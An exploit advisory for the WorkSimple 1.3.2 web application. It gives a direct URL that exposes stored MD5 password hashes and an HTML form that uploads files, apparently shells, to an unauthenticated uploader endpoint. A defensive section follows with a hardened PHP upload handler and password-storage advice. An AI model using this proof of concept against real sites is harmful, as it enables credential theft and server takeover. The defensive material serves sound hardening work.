WorkSimple 1.3.2 shell upload and password disclosure

2010.02.25
Credit: JIKO
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[ Multiple Remote Vulnerabilities ]

----------[Script Info]
Me    : JIKO
Site  : No-exploit.Com
Email : mm :( Moghla9 Ferme Closed

----------[Script Info]
Name     : WorkSimple
Site     : http://geekness.eu/ or http://easton.4fd.us/
Download : http://geekness.eu/sites/default/files/worksimple_1.3.2.zip

----------[exploit Info]

1]~[Password Disclosure Vulnerability]

For all versions
http://localhost/Path/data/secret.php
Name:Md5(Pass)

1]~[Remote File Upload Vulnerability]

file :/modules/uploader.php?startupload

array(".phps",".txt",".html",".png", ".html", ".htm",".jpg",".png", ".bmp",".c",".cpp", ".css", ".h", ".gif", ".torrent", ".jpeg");

---
<form enctype='multipart/form-data' action='[SITE]/modules/uploader.php?startupload' method='post'>
  <input type='hidden' name='MAX_FILE_SIZE' value='500000' />
  Upload a file: <input name='uploadedfile' size='14' type='file' />
  <BR><BR>
  <input class='button' type='submit' value='upload' />
</form>
---

HxH, Cyb3r-DeViL, leopard, ZaIdOoHxHaCkEr, virusman, The Sadhacker, Member No-exploit.Com
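For defenders: the advisory shows only the extension list and the upload form, not the code of uploader.php, so the following is an added example of a hardened upload handler and is not WorkSimple's own code. The session key `user`, the storage path and the narrowed extension-to-MIME map are assumptions made for the example.

```php
<?php
declare(strict_types=1);
session_start();

// Assumptions: the application sets $_SESSION['user'] at login, and
// UPLOAD_DIR is a directory outside the web root (the path is a placeholder).
const UPLOAD_DIR = '/var/worksimple-uploads';
const MAX_BYTES  = 500000; // same value as the form's MAX_FILE_SIZE field
// Extension => MIME type the content must sniff as. Narrowed from the
// advisory's list: .phps, .html and .htm are left out on purpose.
const ALLOWED = [
    'png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'gif' => 'image/gif', 'txt' => 'text/plain',
];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // MAX_FILE_SIZE is sent by the client, so enforce the limit server-side.
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Judge only the final extension of the client-supplied name, lower-cased.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // The sniffed content type has to agree with the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen name: nothing from the client reaches the stored path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (empty($_SESSION['user'])) { // uploads require a logged-in session
    http_response_code(403);
    exit;
}
try {
    echo store_upload($_FILES['uploadedfile'] ?? []);
} catch (RuntimeException $e) {
    http_response_code(400);
}
```

The same reasoning applies to the first issue: a credentials file such as data/secret.php belongs outside the web root, and unsalted MD5 should be replaced with PHP's `password_hash()` and `password_verify()`.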

